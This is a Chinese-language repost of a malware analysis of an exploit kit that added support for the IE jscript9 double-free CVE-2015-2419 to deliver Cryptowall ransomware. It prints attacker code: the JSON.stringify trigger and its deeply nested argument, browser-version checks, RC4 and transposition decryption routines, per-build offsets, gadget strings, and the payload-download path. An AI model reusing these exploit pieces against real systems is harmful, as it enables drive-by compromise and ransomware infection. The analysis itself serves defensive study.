欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

钓鱼工具包(EK)支持CVE-2015-2419漏洞

程序员文章站 2022-07-03 09:57:08
钓鱼工具包(EK)最近增加针对IE浏览器的CVE-2015-2419漏洞的支持,该漏洞刚刚于今年七月得到修复。迅速利用刚刚修复的漏洞,一直是钓鱼工具包EK作者的惯用做法,只不过自从...

钓鱼工具包(EK)最近增加针对IE浏览器的CVE-2015-2419漏洞的支持,该漏洞刚刚于今年七月得到修复。迅速利用刚刚修复的漏洞,一直是钓鱼工具包EK作者的惯用做法,只不过自从2014年下半年开始,他针对的目标一直是Adobe Flash Player 罢了。CVE-2015-2419漏洞是钓鱼工具包进来采用得第二个非Flash漏洞,第一个是Silverlight中的CVE-2015-1671漏洞。这可能是Adobe在Flash Player中采用的新漏洞缓解技术的结果,该技术能够阻止攻击者利用Vector(或类似)对象来控制被破坏的Flash进程。到目前为止,钓鱼工具包已经能够根据目标的具体环境,来利用其上的Flash、IE和Silverlight漏洞了。此外,钓鱼工具包还给它的IE利用代码添加了新的混淆加密技术。登陆页面每次运行时,必须从服务器取得密钥和部分数据后才能够执行漏洞攻击。 这些信息只会发送给受害者一方,即有漏洞的浏览器,并且通过自编的Diffie-Hellman提供XTEA保护。

 

利用Diffie-Hellman密钥交换协议保护IE漏洞利用代码的交付过程

 

钓鱼工具包的登陆页面已经使用HTML和Javascript进行了混淆处理。去掉第一层混淆之后,登陆页面会设法了解平台环境,选择需要使用的漏洞利用程序并启动它。对于该IE漏洞利用来说,它进行了两次混淆处理,并使用共享密钥(Diffie-Hellman(D-H)加密系统针对每个受害者的机器对利用代码进行了不同的处理。 这个加密系统是利用jsbn.js库实现的,这个库与cryptico.js颇为相似。

 

受害者的浏览器会利用POST向攻击者的服务器发送如下所示的JSON。这里使用的命名规则遵循Diffie–Hellman协议的命名规则,其中g是基数,p是模数,A是(g**a_) mod p的余数,其中a_是受害者的秘密指数,不得泄露。 但是,系统对这些值的安全性的关注还是不够,因为这些值是通过Math.random选出来的,而该函数从密码学上来讲是不安全的,此外,数值也太小,并且没有经过素性测试。 数值v源于ScriptEngineBuildNumber(),即jscript9的版本标识。

 

{"g":"78ab123a5d20fda81a9420c241a79f4f","A":"268e38c96cf54350d45537fc97c7

d526","p":"3a5d2e4d0b5a2d2a6b7e2d4e3a8e3c5d","v":"17840"}

 

攻击者使用如下所示的base64编码的版本。B是攻击者的 D-H应答(即(g**b_) mod p,其中b_是攻击者的秘密指数,该指数不能通过网络传输)。 K是破译B所需密钥的加密版本。攻击者通过XTEA利用D-H的共享密钥(s = (A**b_) mod p)来加密一个随机密钥。 受害者利用XTEA解密k,然后解密b。

 

{"B":"194ff891862b55d9f1cf5ce4a10f7f92","k":"GulSjPCeuXPcH%2BvwrHjzew%3D%3D","b":"liTB9J%2FghlAzk%2Bp9Kgbg0Y85WPNx1N0jP8u7qPuXo…”}

 

B用来保存这个漏洞利用代码其他部分(完整的代码见附录部分)用到的一些常量。 这些常量需要通过两次重定向才能够访问,攻击者之所以这样做,可能是为了防止别人对整个利用代码进行静态分析。因为如此以来,静态分析可以了解代码流程,却无法了解这些常量 例如ur0pqm8kx是解码shellcode的口令,stringify是从JSON调用的方法的名称。

 

{"ll":"length","l":"charCodeAt","I":"fromCharCode","Il":"floor","IlI":"random","lI":"str
ingify","lII":"location","II":"host","llI":"number","lll":"ScriptEngineBuildVersion","lIl"
:"ScriptEngineMajorVersion","IIl":"ScriptEngineMinorVersion","Ill":"setInterval","III
":"clearInterval","lIlI":"ur0pqm8kx",…}

 

 

此外,由于缺乏D-H密钥,所以无法重现这些利用代码文件。这时,D-H g、A和p都是随机生成的,所以跟攻击者原来的响应无法匹配。 因此,解出来的D-H共享密钥也是错误的,因为k和b就是错误的,所以这个漏洞利用代码根本无法运行。很明显,要想观察这个攻击过程,需要:

 

1)破解密码2)破解PRNG3)做活体实验

 

目前我们还不清楚为什么攻击者只是针对常数值进行保护,而非针对整个漏洞利用代码。初步判断,他们可能是为了避免不必要的麻烦。

 

CVE-2015-2419漏洞详情

 

CVE-2015-2419是jscript9本地JSON API中的一种双释放(double free)漏洞,该漏洞已经在今年7月被修复了。具体来说,该漏洞在JSON.stringify解析深度嵌套的JSON数据时发生的。攻击者提供给JSON.stringify的完整参数如附录所示。Il1I4['prototype'].yc =

 function(a) {
        if (!a.ma(!1)) throw new Error(3);
        a.kb(!1);
        a.ib(!1);
        JSON["stringify"](this.Pc, this.uc);
        a.ob(!1);
        CollectGarbage()
    };

 

 

验证浏览器版本

 

这个利用代码依赖于jscript9.dll的特定版本。在上面解码的JSON响应中,我们可以看到不同版本jscript9.dll对应于不同的密钥对。

 

"llIlII:{"17416":4080636,"17496":4080636,"17631":4084748,"17640":4084748,"1

7689":4080652,"17728":4088844,"17801":4088844,"17840":4088840,"17905":40

88840}

 

我们可以从下列代码中确认目标版本号:

try {
             var c = a.D["ScriptEngineMajorVersion"](),
                d = a.D["ScriptEngineMinorVersion"]()
                e = a.D["ScriptEngineBuildVersion"](),
                b = c == 11 && d == 0 && e <= 17905;
        } catch(f) {}
        if (!b) throw new Error(-1, window["ScriptEngineBuildVersion"] ? '' + window["ScriptEngineBuildVersion"]() : '');

 

Shellcode解密阶段

 

Shellcode位于去混淆之后的IE漏洞利用代码中,但是它是以加密形式存在的,对应的解密密钥可以从上面解码后的JSON响应中得到。 就本例而言,解密密钥是ur0pqm8kx。

 

解密例程见附录II。

 

有效载荷阶段

 

这个最新的IE漏洞被用来下载勒索软件Cryptowall,该软件类似于钓鱼工具包的变种,是近几个月才被发现的。有效载荷的下载,是以加密的形式通过网络传输的。 下载有效载荷的URL如下所示:

 

url = "https:// + window[location][host] + / + base64_decode(a)";

这里,a是从上面解码的JSON响应中得到的,就本例而言,它是xexec。

 

此外,Xexec()是一个自定义的函数,它的作用是,从工具包的登陆页上面取得密钥,然后解码取得有效载荷所需的路径。

 

    String['prototype']['xexec'] = function() {

        return decryption_routine(encrypted_path)

这里的Encrypted_path位于工具包的登陆页面上。

 

encrypted_path = 'F1om1GGamPpL2dyVZZs0U9vmNWGZmPEJVbw8Rcy95wymVmWJGZwZVYlZVN9

Rhl03lCGSnZibzahZ1duzU14Td2WcUbWPXT0VBLVmsFpW53mbWauYWenJ9Y0mZ

lFVlVFM0XPV3ThBJPO1I  G 0 Z      tp M 2';

利用附录1提供的解密例程,可以解码如下所示的base64编码数据:

 

decrypted_path = ZmF0aGVyLm1odG1sP2ZpcmU9ZW8wJmNvbG9yPVRENm5RJmZlZGVyYWw9ZVVw

d3hzSCZhbnl0aGluZz1iLTUmc2V0PUd4TW1VbXBWYWsmb3JnYW5pemF0aW9uPV

Z1MVBhV0lFTFlOX3JPMGI2Z0pt

解码后得到:

 

 " father.mhtml?fire=eo0&color=TD6nQ&federal=eUpwxsH&anything=b-5&set=GxMmUmpVak&organization=Vu1PaWIELYN_rO0b6gJm"

这就是有效载荷对应的路径。

 

从上面的路径中得到的有效载荷是经过加密处理的。所以,shellcode需要使用XTEA算法来进行解密处理。 所用的XTEA密钥位于去混淆后的HTML页面中。就本例而言,它为Du9JOBgkbfzGvmFF。

 

附录I

 

这里是获得有效载荷路径的解密例程。密钥位于工具包登陆页面中。

 

window["osSnUV"] = new Function ('text', "var cryptKey = key, rawArray = cryptKey.split(''), sortArray = cryptKey.split(''), keyArray=[];sortArray.sort(); var keySize = sortArray.length;for (var i=0; i<keySize; i++) {keyArray."+p+"(rawArray."+i+"(sortArray[i]));}var k = keySize - text.length % keySize;for(var l = 0; l<k;l++) {text += ' ';} var endStr = '', i,j,line,newLine;for (i = 0; i < text.length; i += keySize) {line = text.substr(i,keySize).split('');newLine = '';for (j = 0; j < keySize; j++){newLine += line[keyArray[j]];}endStr = endStr + newLine;}endStr=endStr.replace(/\\s/g,'');return endStr;");

 

 

附录II

 

下面是用来获得shellcode的RC4解密例程,具体如下所示:

function DecryptionRoutine(key, encrypted_shellcode) {
            var d = [], e = 0, f, decrypted_shellcode = '';
    for (h = 0; h < 256; h++)
            {
                        d[h] = h;
            }
    for (h = 0; h < 256; h++)
            {
                        e = (e + d[h] + key.charCodeAt(h % key.length)) % 256;
                        f = d[h];
                        d[h] = d[e];
                        d[e] = f;
            }
    for (var k = e = h = 0; k < encrypted_shellcode.length; k++)
            {
                        h = (h + 1) % 256;
                        e = (e + d[h]) % 256;
                        f = d[h];
                        d[h] = d[e];
                        d[e] = f;
                        decrypted_shellcode += String.fromCharCode(encrypted_shellcode.charCodeAt(k) ^ d[(d[h] + d[e]) % 256]);
            }
    return decrypted_shellcode;
}

 

 

附录III

 

常量b的内容如下所示:

{"ll":"length","l":"charCodeAt","I":"fromCharCode","Il":"floor","IlI":"random","lI":"str
ingify","lII":"location","II":"host","llI":"number","lll":"ScriptEngineBuildVersion","lIl"
:"ScriptEngineMajorVersion","IIl":"ScriptEngineMinorVersion","Ill":"setInterval","III
":"clearInterval","lIlI":"ur0pqm8kx”,"IlII":"https://","lllI":/","lIIl":"u","IlIl":"x","llll":"xexec","Illl":"EAX","lIII":"ECX","IIIl":"EDI","IllI":"ESP",
"IIlI":"XCHG EAX,ESP","IIll":"MOV [ECX+0C],EAX","llIl":"CALL [EAX+4C]","llII":"MOV EDI,[EAX+90]","IIII":"a","lIll":"kernel32.dll","lIlll":"virtualprotect","IIIlI":11,"lIIll":0,"l
llll":17905,"lIllI":500,"llIIl":16,"IlIII":0,"IIIll":1,"IIlII":2,"lIlII":3,"IllIl":4,"lllIl":5,
"IIlll":8,"lIlIl":9,"lIIIl":10,"IllII":11,"lIIlI":12,"IlIll":16,"IIIIl":24,"IlIlI":100,"IIIII":1,
"llIlI":2,"lllII":2147483647,"llIll":4294967295,"IIllI":255,"llIII":256,"lIIII":65535,"IIlIl":167
76960,"IlIIl":16777215,"llllI":4294967040,"IlllIl":4294901760,"Illll":4278190080,"IlllI":65280,"l
lllIl":16711680,"lllIlI":19,"llIIII":4096,"IIIIIl":4294963200,"IIlllI":4095,"llIIlI":14598366,
"IIllIl":48,"llIIll":32,"IIIllI":15352,"llIlll":85,"lIIIII":4096,"IllllI":400,"lIIlII":311296000,
"IIIlIl":61440,"llllII":24,"IIIIll":32,"IlIlIl":17239,"lllllI":15,"IllIll":256,"llIllI":76,
"lllIll":144,"lIlIIl":17416,"IlIIll":65536,"IIlIll":100000,"lIlllI":28,"IIlIlI":60,"lIlIII":44,
"IIIlll":28,"IllIII":128,"lllIIl":20,"lIIIll":12,"lIlIlI":16,"IIlIIl":4,"IlIIIl":2,"lIllll":110,
"IIIlII":64,"IllIlI":-1,"lIIIIl":0,"IllIlII":1,"lIIlll":2,"IlIlll":3,"IIlIII":4,"lIllIl":5,"IIllll"
:7,"IIIIII":9,"lIlIll":10,"IlllII":11,"lIllII":12,"Illlll":-2146823286,"lIIIlI":[148,195],"lIIlIl":[137,65,12,195],"IIllII":[122908,122236,125484,2461125,208055,1572649,249826,271042,98055,62564,162095,163090,340146,172265,
163058,170761,258290,166489,245298,172955,82542],"IlIIII":[150104,149432,152680,3202586,214836,3204663,361185,285227,103426,599295,365261,226292,410596,
180980,226276,179716,320389,175621,307381,792144,183476],"IIIIlI":48,"IIIlIlI":57,"lllIII":65,"IllIIl"
:90,"IlIlII":97,"llllll":122,"IlIllI":16640,"llIlIl":23040,"IlIIlI":4259840,"lIIIIlI":5898240,"llIIIl":
1090519040,"llIIIII":1509949440,"IlIIIlI":32,"IIIlllI":8192,"lllllII":2097152,"IIIllll":536870912,"llIlII":{"17416":4080636,"17496":4080636,"17631":4084748,"17640":4084748,"17689":4080652,"17728":4088844,
"17801":4088844,"17840":4088840,"17905":4088840

 

 

附录IV

 

攻击者为了利用CVE-2015-2419而给JSON.stringify选择的参数:

 

Pc = {"a0":{"a0":{"a0":{"a0":{"a0":{"a0":{"a0":{"a0":"8HEQ36D4","a1":"7UI7T5FN","a2":"RFM8ORW8","a3":"G50CEWBI","a4":"BL30110U","a5":"AWE8A46R","a6":
"058MT5M1","a7":"QNG7RWBF","a8":"FBQL54XA","a9":"574180FM","a10":"6YCTSRH0","a11":"N0AJ34YX","a12":
"AO7CY3D4","a13":"T5XHR4I0","a14":"784508S8","a15":"4TLC3Q4L","a16":"U7A102Q4","a17":"3466F3UR",
"a18":"356Q7028","a19":"8136URQ8"},"a1":"75C4SKMN","a2":"4LD2OP8P","a3":"UI55N7Y4","a4":"J10L02PV",
"a5":"PEK6K2W7","a6":"U5C1L0YL","a7":"K2YWU745","a8":"J4725E35","a9":"OF1WR0HJ","a10":"505TBO78",
"a11":"W48VSPHX","a12":"X83O3FW0","a13":"U68L8DNA","a14":"187V522Y","a15":"37N768W4","a16":"V66R2D77",
"a17":"85QG6W2E","a18":"81JF5PF7","a19":"7B75IS0S"},"a1":"KBG32EST","a2":"2VN32W7B","a3":"4KT5JVBS",
"a4":"EDPUH4AO","a5":"3A430Q13","a6":"2I5D2250","a7":"41OTHIHR","a8":"CWP0EVCJ","a9":"HLYOGE5X",
"a10":"B3AIE208","a11":"L6AFDY71","a12":"5846CMKV","a13":"3S5DVV2T","a14":"7K5GFF8C","a15":"8YP7WBS2"
,"a16":"5X4EP78P","a17":"88574V1B","a18":"DJ7E8H06","a19":"VG7VN4HY"},"a1":"7P0RT015","a2":"IQPV6IKK",
"a3":"2131VW84","a4":"Y81VNW8D","a5":"TUH60UNR","a6":"52S3R10G","a7":"8J37MCEV","a8":"0737UXB3","a9"
:"6W4HEW6L","a10":"2C182X5P","a11":"K2CJ5VIK","a12":"C5LQLKDA","a13":"L1600HY7","a14":"U0MRETE5","a15"
:"1654VHP0","a16":"1K500GJV","a17":"MI20FAM5","a18":"8V4252VN","a19":"34NQB53F"},"a1":"R88W7ICS","a2"
:"VKC0041R","a3":"I28APIDN","a4":"F7FI27O2","a5":"0N8F1K5S","a6":"L811MVQO","a7":"34DAN88P","a8":
"U0885VRN","a9":"68MPG5T2","a10":"BP55YBYF","a11":"TQT3BWD6","a12":"Y51M3LHU","a13":"FB4P602U","a14"
:"J1N2KO31","a15":"THM817A4","a16":"E4J5A6MH","a17":"L4748S67","a18":"0FELJF2W","a19":"7220PJ14"},
"a1":"4GV2J5RI","a2":"RVA6S111","a3":"X1N0RG08","a4":"EH8013F5","a5":"0BA3XJQT","a6":"H2HX3IJ8",
"a7":"2HC268X4","a8":"015L1E33","a9":"ELO6IGC5","a10":"70KTQ6HM","a11":"1M6IX20K","a12":"X64LGJKK",
"a13":"LBX0KLU7","a14":"5Y8O5731","a15":"6QPRW517","a16":"B1C4PIJ8","a17":"6OS8GCER","a18":"1665C783"
,"a19":"0T08F051"},"a1":"L6U0I741","a2":"UC82L302","a3":"3WYW46B4","a4":"KY1U5C7B","a5":"O3IX8D40",
"a6":"332Q0M74","a7":"7G78UVO7","a8":"6RFVUK6J","a9":"RUCN6WD5","a10":"VLCI7Y3Y","a11":"N04O0IC8",
"a12":"UJGIQ8PG","a13":"IQ3CM3HA","a14":"PD8X1412","a15":"475LEQ6N","a16":"4P57I841","a17":
"0U3F5AS8","a18":"57F7OPCG","a19":"16B8JB47"},"a1":"15LTQ001","a2":"1KHWV333","a3":"2JD25FM5","a4"
:"0BYDYLPW","a5":"NIIV0JT2","a6":"JDL3RW02","a7":"QR3BG505","a8":"MY755QR4","a9":"EXFVX4HK","a10"
:"HP3C3671","a11":"8DC42C1H","a12":"33XW2482","a13":"275B431C","a14":"DQBOT0OX","a15":"VPEC8AK4"
,"a16":"7P8E7VCI","a17":"DVDDFV3J","a18":"U22T484L","a19":"722C31R2"}
uc = function (a, b) {
        return b
    }